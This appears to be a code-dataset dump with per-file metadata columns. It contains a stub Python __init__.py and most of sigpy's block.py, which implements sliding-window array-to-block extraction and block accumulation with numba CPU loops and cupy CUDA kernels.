| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f6cf8e1e4cf3c4ec76807ee6ba0e6caf90f8c85f
| 316
|
py
|
Python
|
classes/__init__.py
|
OmarThinks/MoRG
|
fecf78e15453b0efa9223cd5196fea8176cdfdf3
|
[
"MIT"
] | null | null | null |
classes/__init__.py
|
OmarThinks/MoRG
|
fecf78e15453b0efa9223cd5196fea8176cdfdf3
|
[
"MIT"
] | null | null | null |
classes/__init__.py
|
OmarThinks/MoRG
|
fecf78e15453b0efa9223cd5196fea8176cdfdf3
|
[
"MIT"
] | null | null | null |
"""
try:
from .NotReceived import NotReceived
from .errors import *
from .classreader import *
from .checkpoint import Checkpoint
except Exception as e:
from NotReceived import NotReceived
from errors import *
from classreader import *
from checkpoint import Checkpoint
"""
"""
import sys
print(sys.path)"""
| 19.75
| 37
| 0.759494
| 38
| 316
| 6.315789
| 0.368421
| 0.166667
| 0.175
| 0.266667
| 0.825
| 0.825
| 0.825
| 0.825
| 0.825
| 0.825
| 0
| 0
| 0.161392
| 316
| 16
| 38
| 19.75
| 0.90566
| 1.041139
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
120470c227d9ba2b49eaf7b4e99557346482221f
| 34,609
|
py
|
Python
|
sigpy/block.py
|
EfratShimron/sigpy
|
d140abf0fe7268851aec3be74d238a5ba8d2dd28
|
[
"BSD-3-Clause"
] | null | null | null |
sigpy/block.py
|
EfratShimron/sigpy
|
d140abf0fe7268851aec3be74d238a5ba8d2dd28
|
[
"BSD-3-Clause"
] | null | null | null |
sigpy/block.py
|
EfratShimron/sigpy
|
d140abf0fe7268851aec3be74d238a5ba8d2dd28
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Block reshape functions.
"""
import numpy as np
import numba as nb
from sigpy import backend, config, util
__all__ = ['array_to_blocks', 'blocks_to_array']
def array_to_blocks(input, blk_shape, blk_strides):
    """Extract blocks from an array in a sliding window manner.

    Args:
        input (array): input array of shape [..., N_1, ..., N_D]
        blk_shape (tuple): block shape of length D, with D <= 4.
        blk_strides (tuple): block strides of length D.

    Returns:
        array: array of shape [...] + num_blks + blk_shape, where
            num_blks = (N - blk_shape + blk_strides) // blk_strides.

    Example:

        >>> input = np.array([0, 1, 2, 3, 4, 5])
        >>> print(array_to_blocks(input, [2], [2]))
        [[0, 1],
         [2, 3],
         [4, 5]]

    """
    if len(blk_shape) != len(blk_strides):
        raise ValueError('blk_shape must have the same length as blk_strides.')

    D = len(blk_shape)
    # Block count per axis, per the formula in the docstring.
    num_blks = [(i - b + s) // s for i, b,
                s in zip(input.shape[-D:], blk_shape, blk_strides)]
    # All leading axes are treated as a single flattened batch dimension.
    batch_shape = list(input.shape[:-D])
    batch_size = util.prod(batch_shape)
    device = backend.get_device(input)
    xp = device.xp
    with device:
        output = xp.zeros([batch_size] + num_blks + blk_shape,
                          dtype=input.dtype)
        # Collapse batch axes so the kernels below see [batch, N_1, ..., N_D].
        input = input.reshape([batch_size] + list(input.shape[-D:]))

        # Dispatch on dimensionality and device: numba kernels on CPU,
        # cupy ElementwiseKernels otherwise (guarded at module bottom by
        # config.cupy_enabled).
        if D == 1:
            if device == backend.cpu_device:
                _array_to_blocks1(output, input,
                                  batch_size,
                                  blk_shape[-1],
                                  blk_strides[-1],
                                  num_blks[-1])
            else:  # pragma: no cover
                _array_to_blocks1_cuda(input,
                                       batch_size,
                                       blk_shape[-1],
                                       blk_strides[-1],
                                       num_blks[-1],
                                       output,
                                       size=batch_size *
                                       num_blks[-1] * blk_shape[-1])
        elif D == 2:
            if device == backend.cpu_device:
                _array_to_blocks2(output, input,
                                  batch_size, blk_shape[-1], blk_shape[-2],
                                  blk_strides[-1], blk_strides[-2],
                                  num_blks[-1], num_blks[-2])
            else:  # pragma: no cover
                _array_to_blocks2_cuda(input,
                                       batch_size,
                                       blk_shape[-1], blk_shape[-2],
                                       blk_strides[-1], blk_strides[-2],
                                       num_blks[-1], num_blks[-2],
                                       output,
                                       size=batch_size *
                                       num_blks[-1] * num_blks[-2] *
                                       blk_shape[-1] * blk_shape[-2])
        elif D == 3:
            if device == backend.cpu_device:
                _array_to_blocks3(output,
                                  input,
                                  batch_size,
                                  blk_shape[-1],
                                  blk_shape[-2],
                                  blk_shape[-3],
                                  blk_strides[-1],
                                  blk_strides[-2],
                                  blk_strides[-3],
                                  num_blks[-1],
                                  num_blks[-2],
                                  num_blks[-3])
            else:  # pragma: no cover
                _array_to_blocks3_cuda(input,
                                       batch_size,
                                       blk_shape[-1], blk_shape[-2],
                                       blk_shape[-3],
                                       blk_strides[-1], blk_strides[-2],
                                       blk_strides[-3],
                                       num_blks[-1], num_blks[-2],
                                       num_blks[-3],
                                       output,
                                       size=batch_size *
                                       num_blks[-1] * num_blks[-2] *
                                       num_blks[-3] *
                                       blk_shape[-1] * blk_shape[-2] *
                                       blk_shape[-3])
        elif D == 4:
            if device == backend.cpu_device:
                _array_to_blocks4(output,
                                  input,
                                  batch_size,
                                  blk_shape[-1],
                                  blk_shape[-2],
                                  blk_shape[-3],
                                  blk_shape[-4],
                                  blk_strides[-1],
                                  blk_strides[-2],
                                  blk_strides[-3],
                                  blk_strides[-4],
                                  num_blks[-1],
                                  num_blks[-2],
                                  num_blks[-3],
                                  num_blks[-4])
            else:  # pragma: no cover
                _array_to_blocks4_cuda(input,
                                       batch_size,
                                       blk_shape[-1], blk_shape[-2],
                                       blk_shape[-3], blk_shape[-4],
                                       blk_strides[-1], blk_strides[-2],
                                       blk_strides[-3], blk_strides[-4],
                                       num_blks[-1], num_blks[-2],
                                       num_blks[-3], num_blks[-4],
                                       output,
                                       size=batch_size *
                                       num_blks[-1] * num_blks[-2] *
                                       num_blks[-3] * num_blks[-4] *
                                       blk_shape[-1] * blk_shape[-2] *
                                       blk_shape[-3] * blk_shape[-4])
        else:
            raise ValueError('Only support D <= 4, got {}'.format(D))

        # Restore the original batch axes around the block axes.
        return output.reshape(batch_shape + num_blks + blk_shape)
def blocks_to_array(input, oshape, blk_shape, blk_strides):
    """Accumulate blocks into an array in a sliding window manner.

    Adjoint of :func:`array_to_blocks`: overlapping block entries are
    summed into the output.

    Args:
        input (array): input array of shape [...] + num_blks + blk_shape
        oshape (tuple): output shape.
        blk_shape (tuple): block shape of length D.
        blk_strides (tuple): block strides of length D.

    Returns:
        array: array of shape oshape.

    """
    if len(blk_shape) != len(blk_strides):
        raise ValueError('blk_shape must have the same length as blk_strides.')

    D = len(blk_shape)
    # The block-count axes sit between the batch axes and the block axes.
    num_blks = input.shape[-(2 * D):-D]
    batch_shape = list(oshape[:-D])
    batch_size = util.prod(batch_shape)
    device = backend.get_device(input)
    xp = device.xp
    with device:
        output = xp.zeros([batch_size] + list(oshape[-D:]),
                          dtype=input.dtype)
        # Collapse batch axes so the kernels below see a flat batch dimension.
        input = input.reshape([batch_size] + list(input.shape[-2 * D:]))

        # Dispatch on dimensionality and device. On GPU, complex dtypes use a
        # separate kernel that accumulates real/imag parts individually.
        if D == 1:
            if device == backend.cpu_device:
                _blocks_to_array1(output, input,
                                  batch_size, blk_shape[-1],
                                  blk_strides[-1],
                                  num_blks[-1])
            else:  # pragma: no cover
                if np.issubdtype(input.dtype, np.floating):
                    _blocks_to_array1_cuda(input,
                                           batch_size, blk_shape[-1],
                                           blk_strides[-1],
                                           num_blks[-1],
                                           output,
                                           size=batch_size *
                                           num_blks[-1] * blk_shape[-1])
                else:
                    _blocks_to_array1_cuda_complex(input,
                                                   batch_size, blk_shape[-1],
                                                   blk_strides[-1],
                                                   num_blks[-1],
                                                   output,
                                                   size=batch_size
                                                   * num_blks[-1] *
                                                   blk_shape[-1])
        elif D == 2:
            if device == backend.cpu_device:
                _blocks_to_array2(output, input,
                                  batch_size, blk_shape[-1], blk_shape[-2],
                                  blk_strides[-1], blk_strides[-2],
                                  num_blks[-1], num_blks[-2])
            else:  # pragma: no cover
                if np.issubdtype(input.dtype, np.floating):
                    _blocks_to_array2_cuda(input,
                                           batch_size,
                                           blk_shape[-1], blk_shape[-2],
                                           blk_strides[-1], blk_strides[-2],
                                           num_blks[-1], num_blks[-2],
                                           output,
                                           size=batch_size *
                                           num_blks[-1] * num_blks[-2] *
                                           blk_shape[-1] * blk_shape[-2])
                else:  # pragma: no cover
                    _blocks_to_array2_cuda_complex(
                        input,
                        batch_size, blk_shape[-1], blk_shape[-2],
                        blk_strides[-1], blk_strides[-2],
                        num_blks[-1], num_blks[-2],
                        output,
                        size=batch_size * num_blks[-1] * num_blks[-2] *
                        blk_shape[-1] * blk_shape[-2])
        elif D == 3:
            if device == backend.cpu_device:
                _blocks_to_array3(output,
                                  input,
                                  batch_size, blk_shape[-1],
                                  blk_shape[-2],
                                  blk_shape[-3],
                                  blk_strides[-1],
                                  blk_strides[-2],
                                  blk_strides[-3],
                                  num_blks[-1],
                                  num_blks[-2],
                                  num_blks[-3])
            else:  # pragma: no cover
                if np.issubdtype(input.dtype, np.floating):
                    _blocks_to_array3_cuda(
                        input,
                        batch_size,
                        blk_shape[-1], blk_shape[-2], blk_shape[-3],
                        blk_strides[-1], blk_strides[-2], blk_strides[-3],
                        num_blks[-1], num_blks[-2], num_blks[-3],
                        output,
                        size=batch_size * num_blks[-1] * num_blks[-2] *
                        num_blks[-3] * blk_shape[-1] * blk_shape[-2] *
                        blk_shape[-3])
                else:
                    _blocks_to_array3_cuda_complex(
                        input,
                        batch_size,
                        blk_shape[-1], blk_shape[-2], blk_shape[-3],
                        blk_strides[-1], blk_strides[-2], blk_strides[-3],
                        num_blks[-1], num_blks[-2], num_blks[-3],
                        output,
                        size=batch_size *
                        num_blks[-1] * num_blks[-2] * num_blks[-3] *
                        blk_shape[-1] * blk_shape[-2] * blk_shape[-3])
        elif D == 4:
            if device == backend.cpu_device:
                _blocks_to_array4(output,
                                  input,
                                  batch_size, blk_shape[-1],
                                  blk_shape[-2],
                                  blk_shape[-3],
                                  blk_shape[-4],
                                  blk_strides[-1],
                                  blk_strides[-2],
                                  blk_strides[-3],
                                  blk_strides[-4],
                                  num_blks[-1],
                                  num_blks[-2],
                                  num_blks[-3],
                                  num_blks[-4])
            else:  # pragma: no cover
                if np.issubdtype(input.dtype, np.floating):
                    _blocks_to_array4_cuda(
                        input,
                        batch_size, blk_shape[-1], blk_shape[-2],
                        blk_shape[-3], blk_shape[-4],
                        blk_strides[-1], blk_strides[-2],
                        blk_strides[-3], blk_strides[-4],
                        num_blks[-1], num_blks[-2],
                        num_blks[-3], num_blks[-4],
                        output,
                        size=batch_size *
                        num_blks[-1] * num_blks[-2] *
                        num_blks[-3] * num_blks[-4] *
                        blk_shape[-1] * blk_shape[-2] *
                        blk_shape[-3] * blk_shape[-4])
                else:
                    _blocks_to_array4_cuda_complex(
                        input,
                        batch_size, blk_shape[-1], blk_shape[-2],
                        blk_shape[-3], blk_shape[-4],
                        blk_strides[-1], blk_strides[-2],
                        blk_strides[-3], blk_strides[-4],
                        num_blks[-1], num_blks[-2],
                        num_blks[-3], num_blks[-4],
                        output,
                        size=batch_size * num_blks[-1] * num_blks[-2] *
                        num_blks[-3] * num_blks[-4] *
                        blk_shape[-1] * blk_shape[-2] *
                        blk_shape[-3] * blk_shape[-4])
        else:
            raise ValueError('Only support D <= 4, got {}'.format(D))

        return output.reshape(oshape)
@nb.jit(nopython=True, cache=True)  # pragma: no cover
def _array_to_blocks1(output, input, batch_size, Bx, Sx, Nx):
    """Scatter a 1D array into blocks (CPU/numba path).

    Writes output[b, nx, bx] = input[b, nx * Sx + bx] for every source
    index that falls inside the input; out-of-range indices are skipped.
    """
    width = input.shape[-1]
    for batch in range(batch_size):
        for blk in range(Nx):
            start = blk * Sx
            for off in range(Bx):
                src = start + off
                if src < width:
                    output[batch, blk, off] = input[batch, src]
@nb.jit(nopython=True, cache=True)  # pragma: no cover
def _array_to_blocks2(output, input, batch_size, Bx, By, Sx, Sy, Nx, Ny):
    """Scatter a 2D array into blocks (CPU/numba path).

    Writes output[b, ny, nx, by, bx] = input[b, ny * Sy + by, nx * Sx + bx]
    for every in-range source index.
    """
    width = input.shape[-1]
    height = input.shape[-2]
    for batch in range(batch_size):
        for blk_y in range(Ny):
            for blk_x in range(Nx):
                for off_y in range(By):
                    row = blk_y * Sy + off_y
                    if row >= height:
                        continue
                    for off_x in range(Bx):
                        col = blk_x * Sx + off_x
                        if col < width:
                            output[batch, blk_y, blk_x,
                                   off_y, off_x] = input[batch, row, col]
@nb.jit(nopython=True, cache=True)  # pragma: no cover
def _array_to_blocks3(output, input, batch_size, Bx, By, Bz,
                      Sx, Sy, Sz, Nx, Ny, Nz):
    """Scatter a 3D array into blocks (CPU/numba path).

    Writes output[b, nz, ny, nx, bz, by, bx] = input[b, iz, iy, ix] with
    i? = n? * S? + b?, skipping out-of-range source indices.
    """
    for b in range(batch_size):
        for nz in range(Nz):
            for ny in range(Ny):
                for nx in range(Nx):
                    for bz in range(Bz):
                        for by in range(By):
                            for bx in range(Bx):
                                iz = nz * Sz + bz
                                iy = ny * Sy + by
                                ix = nx * Sx + bx
                                if (ix < input.shape[-1] and
                                        iy < input.shape[-2] and
                                        iz < input.shape[-3]):
                                    output[b, nz, ny, nx, bz, by,
                                           bx] = input[b, iz, iy, ix]
@nb.jit(nopython=True, cache=True)  # pragma: no cover
def _array_to_blocks4(output, input, batch_size, Bx, By, Bz, Bt,
                      Sx, Sy, Sz, St,
                      Nx, Ny, Nz, Nt):
    """Scatter a 4D array into blocks (CPU/numba path).

    Writes output[b, nt, nz, ny, nx, bt, bz, by, bx] =
    input[b, it, iz, iy, ix] with i? = n? * S? + b?, skipping
    out-of-range source indices.
    """
    for b in range(batch_size):
        for nt in range(Nt):
            for nz in range(Nz):
                for ny in range(Ny):
                    for nx in range(Nx):
                        for bt in range(Bt):
                            for bz in range(Bz):
                                for by in range(By):
                                    for bx in range(Bx):
                                        it = nt * St + bt
                                        iz = nz * Sz + bz
                                        iy = ny * Sy + by
                                        ix = nx * Sx + bx
                                        if (ix < input.shape[-1] and
                                                iy < input.shape[-2] and
                                                iz < input.shape[-3] and
                                                it < input.shape[-4]):
                                            output[b, nt, nz, ny, nx,
                                                   bt, bz, by,
                                                   bx] = input[b, it,
                                                               iz, iy, ix]
@nb.jit(nopython=True, cache=True)  # pragma: no cover
def _blocks_to_array1(output, input, batch_size, Bx, Sx, Nx):
    """Accumulate 1D blocks back into an array (CPU/numba path).

    Overlapping block entries are summed: output[b, nx * Sx + bx] +=
    input[b, nx, bx], skipping out-of-range destination indices.
    """
    width = output.shape[-1]
    for batch in range(batch_size):
        for blk in range(Nx):
            start = blk * Sx
            for off in range(Bx):
                dst = start + off
                if dst < width:
                    output[batch, dst] += input[batch, blk, off]
@nb.jit(nopython=True, cache=True)  # pragma: no cover
def _blocks_to_array2(output, input, batch_size, Bx, By, Sx, Sy, Nx, Ny):
    """Accumulate 2D blocks back into an array (CPU/numba path).

    Overlapping block entries are summed:
    output[b, ny * Sy + by, nx * Sx + bx] += input[b, ny, nx, by, bx],
    skipping out-of-range destination indices.
    """
    width = output.shape[-1]
    height = output.shape[-2]
    for batch in range(batch_size):
        for blk_y in range(Ny):
            for blk_x in range(Nx):
                for off_y in range(By):
                    row = blk_y * Sy + off_y
                    if row >= height:
                        continue
                    for off_x in range(Bx):
                        col = blk_x * Sx + off_x
                        if col < width:
                            output[batch, row, col] += input[batch, blk_y,
                                                             blk_x, off_y,
                                                             off_x]
@nb.jit(nopython=True, cache=True)  # pragma: no cover
def _blocks_to_array3(output, input, batch_size, Bx, By, Bz, Sx, Sy, Sz,
                      Nx, Ny, Nz):
    """Accumulate 3D blocks back into an array (CPU/numba path).

    Overlapping block entries are summed: output[b, iz, iy, ix] +=
    input[b, nz, ny, nx, bz, by, bx] with i? = n? * S? + b?, skipping
    out-of-range destination indices.
    """
    for b in range(batch_size):
        for nz in range(Nz):
            for ny in range(Ny):
                for nx in range(Nx):
                    for bz in range(Bz):
                        for by in range(By):
                            for bx in range(Bx):
                                iz = nz * Sz + bz
                                iy = ny * Sy + by
                                ix = nx * Sx + bx
                                if (ix < output.shape[-1]
                                        and iy < output.shape[-2]
                                        and iz < output.shape[-3]):
                                    output[b, iz, iy, ix] += input[b, nz,
                                                                   ny, nx,
                                                                   bz, by, bx]
@nb.jit(nopython=True, cache=True)  # pragma: no cover
def _blocks_to_array4(output, input, batch_size, Bx, By, Bz, Bt,
                      Sx, Sy, Sz, St, Nx, Ny, Nz, Nt):
    """Accumulate 4D blocks back into an array (CPU/numba path).

    Overlapping block entries are summed: output[b, it, iz, iy, ix] +=
    input[b, nt, nz, ny, nx, bt, bz, by, bx] with i? = n? * S? + b?,
    skipping out-of-range destination indices.
    """
    for b in range(batch_size):
        for nt in range(Nt):
            for nz in range(Nz):
                for ny in range(Ny):
                    for nx in range(Nx):
                        for bt in range(Bt):
                            for bz in range(Bz):
                                for by in range(By):
                                    for bx in range(Bx):
                                        it = nt * St + bt
                                        iz = nz * Sz + bz
                                        iy = ny * Sy + by
                                        ix = nx * Sx + bx
                                        if (ix < output.shape[-1]
                                                and iy < output.shape[-2]
                                                and iz < output.shape[-3]
                                                and it < output.shape[-4]):
                                            output[b, it,
                                                   iz,
                                                   iy,
                                                   ix] += input[b, nt,
                                                                nz,
                                                                ny,
                                                                nx,
                                                                bt,
                                                                bz,
                                                                by,
                                                                bx]
# GPU implementations, defined only when cupy is available. Each
# ElementwiseKernel decodes the flat element index `i` (supplied by cupy's
# `size=` argument) into (batch, block, offset) coordinates, mirroring the
# nested numba loops above. The `*_complex` variants accumulate the real and
# imaginary parts with two separate atomicAdds on reinterpreted scalar
# pointers.
if config.cupy_enabled:  # pragma: no cover
    import cupy as cp

    _array_to_blocks1_cuda = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, int32 Bx, int32 Sx, int32 Nx',
        'raw T output',
        """
        const int ndim = input.ndim;
        int b = i / Bx / Nx;
        i -= b * Bx * Nx;
        int nx = i / Bx;
        i -= nx * Bx;
        int bx = i;
        int ix = nx * Sx + bx;
        if (ix < input.shape()[ndim - 1]) {
            int input_idx[] = {b, ix};
            int output_idx[] = {b, nx, bx};
            output[output_idx] = input[input_idx];
        }
        """,
        name='_array_to_blocks1_cuda')

    _array_to_blocks2_cuda = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, int32 Bx, int32 By, '
        'int32 Sx, int32 Sy, int32 Nx, int32 Ny',
        'raw T output',
        """
        const int ndim = input.ndim;
        int b = i / Bx / By / Nx / Ny;
        i -= b * Bx * By * Nx * Ny;
        int ny = i / Bx / By / Nx;
        i -= ny * Bx * By * Nx;
        int nx = i / Bx / By;
        i -= nx * Bx * By;
        int by = i / Bx;
        i -= by * Bx;
        int bx = i;
        int iy = ny * Sy + by;
        int ix = nx * Sx + bx;
        if (ix < input.shape()[ndim - 1] && iy < input.shape()[ndim - 2]) {
            int input_idx[] = {b, iy, ix};
            int output_idx[] = {b, ny, nx, by, bx};
            output[output_idx] = input[input_idx];
        }
        """,
        name='_array_to_blocks2_cuda')

    _array_to_blocks3_cuda = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, int32 Bx, int32 By, int32 Bz, '
        'int32 Sx, int32 Sy, int32 Sz, int32 Nx, int32 Ny, int32 Nz',
        'raw T output',
        """
        const int ndim = input.ndim;
        int b = i / Bx / By / Bz / Nx / Ny / Nz;
        i -= b * Bx * By * Bz * Nx * Ny * Nz;
        int nz = i / Bx / By / Bz / Nx / Ny;
        i -= nz * Bx * By * Bz * Nx * Ny;
        int ny = i / Bx / By / Bz / Nx;
        i -= ny * Bx * By * Bz * Nx;
        int nx = i / Bx / By / Bz;
        i -= nx * Bx * By * Bz;
        int bz = i / Bx / By;
        i -= bz * Bx * By;
        int by = i / Bx;
        i -= by * Bx;
        int bx = i;
        int iz = nz * Sz + bz;
        int iy = ny * Sy + by;
        int ix = nx * Sx + bx;
        if (ix < input.shape()[ndim - 1] && iy < input.shape()[ndim - 2]
            && iz < input.shape()[ndim - 3]) {
            int input_idx[] = {b, iz, iy, ix};
            int output_idx[] = {b, nz, ny, nx, bz, by, bx};
            output[output_idx] = input[input_idx];
        }
        """,
        name='_array_to_blocks3_cuda')

    _array_to_blocks4_cuda = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, '
        'int32 Bx, int32 By, int32 Bz, int32 Bt, '
        'int32 Sx, int32 Sy, int32 Sz, int32 St, '
        'int32 Nx, int32 Ny, int32 Nz, int32 Nt',
        'raw T output',
        """
        const int ndim = input.ndim;
        int b = i / Bx / By / Bz / Bt / Nx / Ny / Nz / Nt;
        i -= b * Bx * By * Bz * Bt * Nx * Ny * Nz * Nt;
        int nt = i / Bx / By / Bz / Bt / Nx / Ny / Nz;
        i -= nt * Bx * By * Bz * Bt * Nx * Ny * Nz;
        int nz = i / Bx / By / Bz / Bt / Nx / Ny;
        i -= nz * Bx * By * Bz * Bt * Nx * Ny;
        int ny = i / Bx / By / Bz / Bt / Nx;
        i -= ny * Bx * By * Bz * Bt * Nx;
        int nx = i / Bx / By / Bz / Bt;
        i -= nx * Bx * By * Bz * Bt;
        int bt = i / Bx / By / Bz;
        i -= bt * Bx * By * Bz;
        int bz = i / Bx / By;
        i -= bz * Bx * By;
        int by = i / Bx;
        i -= by * Bx;
        int bx = i;
        int it = nt * St + bt;
        int iz = nz * Sz + bz;
        int iy = ny * Sy + by;
        int ix = nx * Sx + bx;
        if (ix < input.shape()[ndim - 1] && iy < input.shape()[ndim - 2]
            && iz < input.shape()[ndim - 3] && it < input.shape()[ndim - 4]) {
            int input_idx[] = {b, it, iz, iy, ix};
            int output_idx[] = {b, nt, nz, ny, nx, bt, bz, by, bx};
            output[output_idx] = input[input_idx];
        }
        """,
        name='_array_to_blocks4_cuda')

    _blocks_to_array1_cuda = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, int32 Bx, int32 Sx, int32 Nx',
        'raw T output',
        """
        const int ndim = output.ndim;
        int b = i / Bx / Nx;
        i -= b * Bx * Nx;
        int nx = i / Bx;
        i -= nx * Bx;
        int bx = i;
        int ix = nx * Sx + bx;
        if (ix < output.shape()[ndim - 1]) {
            int input_idx[] = {b, nx, bx};
            int output_idx[] = {b, ix};
            atomicAdd(&output[output_idx], input[input_idx]);
        }
        """,
        name='_blocks_to_array1_cuda')

    _blocks_to_array1_cuda_complex = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, int32 Bx, int32 Sx, int32 Nx',
        'raw T output',
        """
        const int ndim = output.ndim;
        int b = i / Bx / Nx;
        i -= b * Bx * Nx;
        int nx = i / Bx;
        i -= nx * Bx;
        int bx = i;
        int ix = nx * Sx + bx;
        if (ix < output.shape()[ndim - 1]) {
            int input_idx[] = {b, nx, bx};
            int output_idx[] = {b, ix};
            atomicAdd(reinterpret_cast<T::value_type*>(&(output[output_idx])),
                      input[input_idx].real());
            atomicAdd(
                reinterpret_cast<T::value_type*>(&(output[output_idx])) + 1,
                input[input_idx].imag());
        }
        """,
        name='_blocks_to_array1_cuda_complex')

    _blocks_to_array2_cuda = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, '
        'int32 Bx, int32 By, int32 Sx, int32 Sy, '
        'int32 Nx, int32 Ny',
        'raw T output',
        """
        const int ndim = output.ndim;
        int b = i / Bx / By / Nx / Ny;
        i -= b * Bx * By * Nx * Ny;
        int ny = i / Bx / By / Nx;
        i -= ny * Bx * By * Nx;
        int nx = i / Bx / By;
        i -= nx * Bx * By;
        int by = i / Bx;
        i -= by * Bx;
        int bx = i;
        int iy = ny * Sy + by;
        int ix = nx * Sx + bx;
        if (ix < output.shape()[ndim - 1] && iy < output.shape()[ndim - 2]) {
            int input_idx[] = {b, ny, nx, by, bx};
            int output_idx[] = {b, iy, ix};
            atomicAdd(&output[output_idx], input[input_idx]);
        }
        """,
        name='_blocks_to_array2_cuda')

    _blocks_to_array2_cuda_complex = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, '
        'int32 Bx, int32 By, int32 Sx, int32 Sy, '
        'int32 Nx, int32 Ny',
        'raw T output',
        """
        const int ndim = output.ndim;
        int b = i / Bx / By / Nx / Ny;
        i -= b * Bx * By * Nx * Ny;
        int ny = i / Bx / By / Nx;
        i -= ny * Bx * By * Nx;
        int nx = i / Bx / By;
        i -= nx * Bx * By;
        int by = i / Bx;
        i -= by * Bx;
        int bx = i;
        int iy = ny * Sy + by;
        int ix = nx * Sx + bx;
        if (ix < output.shape()[ndim - 1] && iy < output.shape()[ndim - 2]) {
            int input_idx[] = {b, ny, nx, by, bx};
            int output_idx[] = {b, iy, ix};
            atomicAdd(reinterpret_cast<T::value_type*>(&(output[output_idx])),
                      input[input_idx].real());
            atomicAdd(
                reinterpret_cast<T::value_type*>(&(output[output_idx])) + 1,
                input[input_idx].imag());
        }
        """,
        name='_blocks_to_array2_cuda_complex')

    _blocks_to_array3_cuda = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, int32 Bx, int32 By, int32 Bz, '
        'int32 Sx, int32 Sy, int32 Sz, int32 Nx, int32 Ny, int32 Nz',
        'raw T output',
        """
        const int ndim = output.ndim;
        int b = i / Bx / By / Bz / Nx / Ny / Nz;
        i -= b * Bx * By * Bz * Nx * Ny * Nz;
        int nz = i / Bx / By / Bz / Nx / Ny;
        i -= nz * Bx * By * Bz * Nx * Ny;
        int ny = i / Bx / By / Bz / Nx;
        i -= ny * Bx * By * Bz * Nx;
        int nx = i / Bx / By / Bz;
        i -= nx * Bx * By * Bz;
        int bz = i / Bx / By;
        i -= bz * Bx * By;
        int by = i / Bx;
        i -= by * Bx;
        int bx = i;
        int iz = nz * Sz + bz;
        int iy = ny * Sy + by;
        int ix = nx * Sx + bx;
        if (ix < output.shape()[ndim - 1] &&
            iy < output.shape()[ndim - 2] &&
            iz < output.shape()[ndim - 3]) {
            int input_idx[] = {b, nz, ny, nx, bz, by, bx};
            int output_idx[] = {b, iz, iy, ix};
            atomicAdd(&output[output_idx], input[input_idx]);
        }
        """,
        name='_blocks_to_array3_cuda')

    _blocks_to_array3_cuda_complex = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, int32 Bx, int32 By, int32 Bz, '
        'int32 Sx, int32 Sy, int32 Sz, int32 Nx, int32 Ny, int32 Nz',
        'raw T output',
        """
        const int ndim = output.ndim;
        int b = i / Bx / By / Bz / Nx / Ny / Nz;
        i -= b * Bx * By * Bz * Nx * Ny * Nz;
        int nz = i / Bx / By / Bz / Nx / Ny;
        i -= nz * Bx * By * Bz * Nx * Ny;
        int ny = i / Bx / By / Bz / Nx;
        i -= ny * Bx * By * Bz * Nx;
        int nx = i / Bx / By / Bz;
        i -= nx * Bx * By * Bz;
        int bz = i / Bx / By;
        i -= bz * Bx * By;
        int by = i / Bx;
        i -= by * Bx;
        int bx = i;
        int iz = nz * Sz + bz;
        int iy = ny * Sy + by;
        int ix = nx * Sx + bx;
        if (ix < output.shape()[ndim - 1] &&
            iy < output.shape()[ndim - 2] &&
            iz < output.shape()[ndim - 3]) {
            int input_idx[] = {b, nz, ny, nx, bz, by, bx};
            int output_idx[] = {b, iz, iy, ix};
            atomicAdd(reinterpret_cast<T::value_type*>(&(output[output_idx])),
                      input[input_idx].real());
            atomicAdd(reinterpret_cast<T::value_type*>(
                &(output[output_idx])) + 1, input[input_idx].imag());
        }
        """,
        name='_blocks_to_array3_cuda_complex')

    _blocks_to_array4_cuda = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, '
        'int32 Bx, int32 By, int32 Bz, int32 Bt, '
        'int32 Sx, int32 Sy, int32 Sz, int32 St, '
        'int32 Nx, int32 Ny, int32 Nz, int32 Nt',
        'raw T output',
        """
        const int ndim = output.ndim;
        int b = i / Bx / By / Bz / Bt / Nx / Ny / Nz / Nt;
        i -= b * Bx * By * Bz * Bt * Nx * Ny * Nz * Nt;
        int nt = i / Bx / By / Bz / Bt / Nx / Ny / Nz;
        i -= nt * Bx * By * Bz * Bt * Nx * Ny * Nz;
        int nz = i / Bx / By / Bz / Bt / Nx / Ny;
        i -= nz * Bx * By * Bz * Bt * Nx * Ny;
        int ny = i / Bx / By / Bz / Bt / Nx;
        i -= ny * Bx * By * Bz * Bt * Nx;
        int nx = i / Bx / By / Bz / Bt;
        i -= nx * Bx * By * Bz * Bt;
        int bt = i / Bx / By / Bz;
        i -= bt * Bx * By * Bz;
        int bz = i / Bx / By;
        i -= bz * Bx * By;
        int by = i / Bx;
        i -= by * Bx;
        int bx = i;
        int it = nt * St + bt;
        int iz = nz * Sz + bz;
        int iy = ny * Sy + by;
        int ix = nx * Sx + bx;
        if (ix < output.shape()[ndim - 1] &&
            iy < output.shape()[ndim - 2] &&
            iz < output.shape()[ndim - 3] &&
            it < output.shape()[ndim - 4]) {
            int input_idx[] = {b, nt, nz, ny, nx, bt, bz, by, bx};
            int output_idx[] = {b, it, iz, iy, ix};
            atomicAdd(&output[output_idx], input[input_idx]);
        }
        """,
        name='_blocks_to_array4_cuda')

    _blocks_to_array4_cuda_complex = cp.ElementwiseKernel(
        'raw T input, int32 batch_size, '
